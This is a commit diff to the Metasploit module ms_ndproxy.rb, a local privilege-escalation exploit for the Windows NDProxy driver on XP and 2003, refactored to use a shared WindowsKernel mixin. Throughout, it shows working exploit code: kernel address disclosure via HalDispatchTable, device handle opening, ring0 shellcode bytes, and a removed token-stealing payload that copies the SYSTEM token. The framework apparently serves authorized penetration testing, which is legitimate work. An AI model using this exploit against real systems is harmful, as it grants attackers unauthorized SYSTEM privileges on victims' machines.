Switch ms_ndproxy to use the new WindowsKernel mixin

Author: zeroSteiner

modules/exploits/windows/local/ms_ndproxy.rb

@@ -4,11 +4,13 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/local/windows_kernel'
 require 'rex'
 
 class Metasploit3 < Msf::Exploit::Local
   Rank = AverageRanking
 
+  include Msf::Exploit::Local::WindowsKernel
   include Msf::Post::File
   include Msf::Post::Windows::Priv
   include Msf::Post::Windows::Process
@@ -84,89 +86,14 @@ module has been tested successfully on Windows XP SP3 and Windows 2003 SP2. In o
       'DisclosureDate'=> 'Nov 27 2013',
       'DefaultTarget' => 0
     }))
-
-  end
-
-  def add_railgun_functions
-    session.railgun.add_dll('psapi') unless session.railgun.dlls.keys.include?('psapi')
-    session.railgun.add_function(
-      'psapi',
-      'EnumDeviceDrivers',
-      'BOOL',
-      [
-        ["PBLOB", "lpImageBase", "out"],
-        ["DWORD", "cb", "in"],
-        ["PDWORD", "lpcbNeeded", "out"]
-      ])
-    session.railgun.add_function(
-      'psapi',
-      'GetDeviceDriverBaseNameA',
-      'DWORD',
-      [
-        ["LPVOID", "ImageBase", "in"],
-        ["PBLOB", "lpBaseName", "out"],
-        ["DWORD", "nSize", "in"]
-      ])
-  end
-
-  def open_device(dev)
-
-    invalid_handle_value = 0xFFFFFFFF
-
-    r = session.railgun.kernel32.CreateFileA(dev, 0x0, 0x0, nil, 0x3, 0, 0)
-
-    handle = r['return']
-
-    if handle == invalid_handle_value
-      return nil
-    end
-
-    return handle
-  end
-
-  def find_sys_base(drvname)
-    results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
-    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*")
-
-    addresses.each do |address|
-      results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
-      current_drvname = results['lpBaseName'][0..results['return'] - 1]
-      if drvname == nil
-        if current_drvname.downcase.include?('krnl')
-          return [address, current_drvname]
-        end
-      elsif drvname == results['lpBaseName'][0..results['return'] - 1]
-        return [address, current_drvname]
-      end
-    end
-
-    return nil
   end
 
   def ring0_shellcode(t)
     restore_ptrs =  "\x31\xc0"                                                # xor eax, eax
     restore_ptrs << "\xb8" + [ @addresses["HaliQuerySystemInfo"] ].pack("L")  # mov eax, offset hal!HaliQuerySystemInformation
     restore_ptrs << "\xa3" + [ @addresses["halDispatchTable"] + 4 ].pack("L") # mov dword ptr [nt!HalDispatchTable+0x4], eax
 
-    tokenstealing =  "\x52"                                                   # push edx                         # Save edx on the stack
-    tokenstealing << "\x53"                                                   # push ebx                         # Save ebx on the stack
-    tokenstealing << "\x33\xc0"                                               # xor eax, eax                     # eax = 0
-    tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00"                           # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD
-    tokenstealing << "\x8b\x40" + t['_KPROCESS']                              # mov eax, dword ptr [eax+44h]     # Retrieve _KPROCESS
-    tokenstealing << "\x8b\xc8"                                               # mov ecx, eax
-    tokenstealing << "\x8b\x98" + t['_TOKEN'] + "\x00\x00\x00"                # mov ebx, dword ptr [eax+0C8h]    # Retrieves TOKEN
-    tokenstealing << "\x8b\x80" + t['_APLINKS'] + "\x00\x00\x00"              # mov eax, dword ptr [eax+88h]  <====| # Retrieve FLINK from ActiveProcessLinks
-    tokenstealing << "\x81\xe8" + t['_APLINKS'] + "\x00\x00\x00"              # sub eax,88h                        | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
-    tokenstealing << "\x81\xb8" + t['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" # cmp dword ptr [eax+84h], 4         | # Compares UniqueProcessId with 4 (The System Process on Windows XP)
-    tokenstealing << "\x75\xe8"                                               # jne 0000101e ======================
-    tokenstealing << "\x8b\x90" + t['_TOKEN'] + "\x00\x00\x00"                # mov edx,dword ptr [eax+0C8h]     # Retrieves TOKEN and stores on EDX
-    tokenstealing << "\x8b\xc1"                                               # mov eax, ecx                     # Retrieves KPROCESS stored on ECX
-    tokenstealing << "\x89\x90" + t['_TOKEN'] + "\x00\x00\x00"                # mov dword ptr [eax+0C8h],edx     # Overwrites the TOKEN for the current KPROCESS
-    tokenstealing << "\x5b"                                                   # pop ebx                          # Restores ebx
-    tokenstealing << "\x5a"                                                   # pop edx                          # Restores edx
-    tokenstealing << "\xc2\x10"                                               # ret 10h                          # Away from the kernel!
-
-    ring0_shellcode = restore_ptrs + tokenstealing
+    ring0_shellcode = restore_ptrs + token_stealing_shellcode(t)
     return ring0_shellcode
   end
 
@@ -211,33 +138,8 @@ def create_proc
   def disclose_addresses(t)
     addresses = {}
 
-    vprint_status("Getting the Kernel module name...")
-    kernel_info = find_sys_base(nil)
-    if kernel_info.nil?
-      vprint_error("Failed to disclose the Kernel module name")
-      return nil
-    end
-    vprint_good("Kernel module found: #{kernel_info[1]}")
-
-    vprint_status("Getting a Kernel handle...")
-    kernel32_handle = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
-    kernel32_handle = kernel32_handle['return']
-    if kernel32_handle == 0
-      vprint_error("Failed to get a Kernel handle")
-      return nil
-    end
-    vprint_good("Kernel handle acquired")
-
-
-    vprint_status("Disclosing the HalDispatchTable...")
-    hal_dispatch_table = session.railgun.kernel32.GetProcAddress(kernel32_handle, "HalDispatchTable")
-    hal_dispatch_table = hal_dispatch_table['return']
-    if hal_dispatch_table == 0
-      vprint_error("Failed to disclose the HalDispatchTable")
-      return nil
-    end
-    hal_dispatch_table -= kernel32_handle
-    hal_dispatch_table += kernel_info[0]
+    hal_dispatch_table = find_haldispatchtable
+    return nil if hal_dispatch_table.nil?
     addresses["halDispatchTable"] = hal_dispatch_table
     vprint_good("HalDispatchTable found at 0x#{addresses["halDispatchTable"].to_s(16)}")
 
@@ -257,16 +159,12 @@ def disclose_addresses(t)
     return addresses
   end
 
-
   def check
-    vprint_status("Adding the railgun stuff...")
-    add_railgun_functions
-
     if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
       return Exploit::CheckCode::Detected
     end
 
-    handle = open_device("\\\\.\\NDProxy")
+    handle = open_device("\\\\.\\NDProxy", 0x0, 0x0, 0x3)
     if handle.nil?
       return Exploit::CheckCode::Safe
     end
@@ -289,10 +187,6 @@ def check
   end
 
   def exploit
-
-    vprint_status("Adding the railgun stuff...")
-    add_railgun_functions
-
     if sysinfo["Architecture"] =~ /wow64/i
       fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
     elsif sysinfo["Architecture"] =~ /x64/
@@ -322,7 +216,7 @@ def exploit
     end
 
     print_status("Checking device...")
-    handle = open_device("\\\\.\\NDProxy")
+    handle = open_device("\\\\.\\NDProxy", 0x0, 0x0, 0x3)
     if handle.nil?
       fail_with(Failure::NoTarget, "\\\\.\\NDProxy device not found")
     else
@@ -409,9 +303,5 @@ def exploit
     else
       fail_with(Failure::Unknown, "Error while executing the payload")
     end
-
-
   end
-
 end
-